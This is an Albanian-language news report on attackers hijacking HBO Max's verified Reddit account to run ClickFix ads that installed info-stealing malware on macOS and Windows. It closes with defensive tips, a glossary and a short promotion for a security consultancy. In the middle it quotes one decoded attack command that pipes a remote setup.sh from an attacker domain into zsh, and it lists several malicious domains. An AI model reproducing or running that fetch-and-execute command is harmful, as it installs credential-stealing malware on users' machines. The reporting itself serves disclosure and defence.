Llogaria Reddit e HBO Max u rrëmbye për të përhapur malware ClickFix

Llogaria Reddit e HBO Max u rrëmbye për të përhapur malware ClickFix

Hakerat rrëmbyen llogarinë e verifikuar të HBO Max në Reddit dhe publikuan 108 reklama ClickFix gjatë dy ditëve, duke mashtruar përdoruesit e Windows dhe macOS që të ngjitin komanda që instalonin malware që vjedh informacione.

Kriminelët kibernetikë morën kontrollin e llogarisë zyrtare të HBO Max në Reddit dhe e përdorën atë për të publikuar reklama keqdashëse që shpërndanin malware që vjedh informacione në kompjuterat Windows dhe macOS. Studiuesit e sigurisë në Hudson Rock dhe ADAMnetworks analizuan fushatën dhe raportuan se llogaria e verifikuar u/hbomax u rrëmbye dhe u përdor për të nisur 108 reklama keqdashëse për rreth 48 orë. Reklamat përdorën një teknikë inxhinierie sociale të njohur si ClickFix, në të cilën viktimat mashtrohen të kopjojnë dhe ngjitin komanda në mjetet e integruara të sistemit si Windows Run, PowerShell ose Terminali i macOS. Komandat paraqiten si një mënyrë për të rregulluar një gabim, për të plotësuar një CAPTCHA ose për të instaluar softuer legjitim, por në fakt ato ekzekutojnë kod të kontrolluar nga sulmuesi që shkarkon dhe ekzekuton malware.

Taktika ClickFix është bërë më e zakonshme sepse viktima kryen vetë veprimin e dëmshëm duke përdorur mjete që janë pjesë e sistemit operativ. Kjo mund të anashkalojë disa mbrojtje të shfletuesit dhe softuer sigurie që fokusohen në zbulimin e shkarkimeve keqdashëse, pasi asnjë skedar keqdashës nuk dorëzohet derisa komanda të ekzekutohet dhe të marrë ngarkesën nga një server në distancë. Në këtë incident, disa nga reklamat paraqiteshin si promovime për shërbimin e transmetimit HBO Max, ndërsa të tjerat reklamonin mjete të rreme të inteligjencës artificiale, softuer për zhvillues dhe mjete macOS. Hudson Rock dhe ADAMnetworks e lidhën aktivitetin me një operacion më të gjerë që e quajnë PasteSwitch, i cili synon si makinat Windows ashtu edhe ato macOS dhe është përdorur për të shpërndarë vjedhës informacionesh, ngarkues, prerës kriptomonedhash dhe aplikacione të falsifikuara të portofolave të kriptomonedhave. Emri PasteSwitch i referohet mënyrës se si viktimat ngjitin komandat e furnizuara nga sulmuesi në sistemet e tyre, ndërsa infrastruktura e backend-it kalon midis fushatave, platformave, ngarkesave dhe metodave të vjedhjes së kriptove në varësi të vizitorit.

Fushata u vu re për herë të parë kur një përdorues i Reddit pa një reklamë që dukej se vinte nga llogaria e verifikuar e HBO Max dhe promovonte atë që dukej si një aplikacion native HBO Max për macOS. Përdoruesi përshkroi se pa u/hbomax si autorin e reklamës dhe u interesua sepse llogaria kishte postuar shumë herë në subreddit-et zyrtare të HBO Max. Pasi klikuan reklamën, vizitorët u ridrejtuan në një faqe interneti të rreme bindëse të HBO Max, duke përfshirë një në hbomaxx[.]us, që pretendonte se ofronte aplikacionin për shkarkim. Megjithatë, shtypja e butonit të shkarkimit nuk dha një instalues. Në vend të kësaj, faqja shfaqi udhëzime që u thoshin vizitorëve të hapnin Terminalin e macOS dhe të ngjitnin një komandë për të instaluar softuerin. BleepingComputer ekzaminoi një nga komandat e macOS, e cila përdorte kodimin Base64 për të fshehur përmbajtjen e saj të vërtetë. Pas dekodimit, komanda ishte: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh. Hudson Rock identifikoi ember-bridge[.]com si infrastrukturë e përdorur në shtator për dërgimin e malware në operacionin PasteSwitch.

Në macOS, sulmi dha një familje malware të quajtur MacSync, e cila sipas Hudson Rock vjedh kredencialet e ruajtura të shfletuesit, profilet e Firefox, të dhënat e Telegram, Apple Notes dhe fjalëkalimet e macOS. Një zinxhir i dytë infeksioni përdori një komponent të quajtur AMOS helper, i cili vendos qëndrueshmëri duke krijuar një direktori të quajtur .com.apple.accountsd. Pasi vendoset, malware mund të regjistrojë sistemin e infektuar me serverë të kontrolluar nga sulmuesi për të marrë detyra shtesë. E njëjta fushatë reklamimi shpërndau gjithashtu aplikacione të rreme të portofolave të kriptomonedhave Ledger, Trezor Suite dhe Exodus, të destinuara për të vjedhur frazat e rikuperimit të portofolave të viktimave, të cilat janë fjalët sekrete që rikthejnë aksesin në një portofol kripto. Në Windows, PasteSwitch shfaqi udhëzime që çuan viktimat të ekzekutonin komanda me mshta dhe PowerShell. Hudson Rock përshkroi një zinxhir sulmi në Windows që përdorte një skedar poliglot MP3/HTA për të krijuar një detyrë të planifikuar, për të nisur PowerShell 32-bit, për të çaktivizuar Antimalware Scan Interface të Microsoft dhe për të gjeneruar infrastrukturë specifike për viktimën bazuar në emrin e kompjuterit dhe emrin e përdoruesit. Fazat e mëvonshme u mbështetën në PowerShell të errësuar dhe shellcode për të ngarkuar një vjedhës të quajtur Amatera direkt në memorie, pa e ruajtur ngarkesën përfundimtare në disk.

Reklama e HBO Max ishte pjesë e një fushate reklamimi shumë më të madhe të operuar përmes llogarisë së komprometuar të Reddit. Studiuesit identifikuan 40 reklama që tregonin në hbomaxx[.]app, 36 që promovonin faqen e rreme të AI dhe zhvilluesve codex-craft[.]com, 15 që promovonin apple.clean-disk-guide[.]com, 11 që tregonin në code-desktop[.]com dhe gjashtë që promovonin hbomax-macos[.]com. Kjo i lejoi kriminelët të synonin shumë më tepër sesa përdoruesit e HBO Max, duke arritur edhe zhvilluesit dhe njerëzit që kërkonin softuer AI dhe mjete sistemi. Pasi u raportuan reklamat keqdashëse, një administrator i Reddit i pauzoi ato dhe i raportoi në ekipet e Sigurisë dhe Sigurisë së Reddit. Mbetet e paqartë se si sulmuesit fituan akses në llogarinë e HBO Max në Reddit ose nëse ndonjë llogari ose sistem tjetër i HBO ose Warner Bros. Discovery u prek. BleepingComputer kontaktoi HBO dhe Warner Bros. Discovery me pyetje rreth incidentit, por nuk mori përgjigje.

Për pronarët e faqeve të internetit, bizneset dhe përdoruesit e përditshëm të internetit, ky incident është një kujtesë se një shenjë e verifikuar ose një emër i njohur marke nuk e bën një reklamë online ose një lidhje shkarkimi të sigurt. Sulmet ClickFix janë veçanërisht të rrezikshme sepse i kërkojnë viktimës të ekzekutojë një komandë manualisht, gjë që e vendos veprimin jashtë rrugës normale të skanimit të skedarëve të përdorur nga shumë mbrojtje endpoint. Mbrojtja më e fortë është të mos ngjitni kurrë një komandë nga një faqe interneti në Terminal, PowerShell ose dialogun Run, përveç nëse e kuptoni saktësisht se çfarë bën dhe e keni konfirmuar burimin në mënyrë të pavarur. Bashkëpunimi me një partner infrastrukture dhe konsulencë të fokusuar në siguri si AEU-I mund t'i ndihmojë bizneset të rishikojnë kontrollet e endpoint-it dhe rrjetit kundër sulmeve të ngjitjes dhe ekzekutimit, por asnjë shërbim teknik nuk zëvendëson nevojën për ndërgjegjësimin e përdoruesit dhe verifikimin përpara ekzekutimit të komandave.

Si të Mbroheni

  1. Mos kopjoni dhe ngjitni kurrë një komandë nga një faqe interneti në rreshtin e komandave të kompjuterit tuaj, pavarësisht sa zyrtare duket faqja.
  2. Nëse një reklamë ose faqe ju thotë të rregulloni një gabim ose të verifikoni një CAPTCHA duke ngjitur tekst, mbyllni faqen dhe shkoni drejtpërdrejt në faqen zyrtare duke shkruar vetë adresën.
  3. Përpara se të shkarkoni ndonjë aplikacion, kontrolloni me kujdes adresën e internetit dhe kërkoni gabime të vogla shkrimi ose shkronja shtesë si hbomaxx.us në vend të hbomax.com.
  4. Mbani sistemin operativ dhe shfletuesin të përditësuar dhe përdorni një mjet sigurie që mund të bllokojë faqet e internetit të njohura si keqdashëse.
  5. Nëse përdorni një portofol kriptomonedhash, mos e vendosni kurrë frazën tuaj të rikuperimit në asnjë aplikacion ose faqe interneti, përveç nëse jeni absolutisht i sigurt se keni instaluar portofolin zyrtar.
  6. Raportoni reklamat ose postimet e dyshimta në platformat sociale duke përdorur funksionin e raportimit të platformës.

Termat e Shpjeguar

  • ClickFix Një teknikë mashtrimi ku kriminelët i mashtrojnë njerëzit të ngjitin dhe ekzekutojnë një komandë në kompjuterin e tyre, e cila instalon malware në vend që të rregullojë një problem.
  • Malware Shkurtim për softuer keqdashës, një program i krijuar për të dëmtuar ose marrë kontrollin e një pajisjeje ose për të vjedhur të dhëna.
  • Base64 Një mënyrë për të kthyer tekst ose të dhëna në një përzierje shkronjash, numrash dhe simbolesh, në mënyrë që njerëzit ta kenë më të vështirë të shohin se çfarë thotë në të vërtetë.
  • PowerShell Një mjet i integruar i Windows që u lejon përdoruesve të ekzekutojnë komanda, shpesh i përdorur nga hakerat sepse sistemi i beson atij.
  • Cryptocurrency wallet Një pjesë softueri ose hardueri që ruan çelësat sekretë të nevojshëm për të përdorur para dixhitale si Bitcoin.
  • Info-stealer Një lloj malware që mbledh fjalëkalimet e ruajtura, cookies dhe të dhëna të tjera private nga një kompjuter i infektuar.

Shërbime AEU të lidhura

  • AEU-I Konsulencë IT dhe sigurie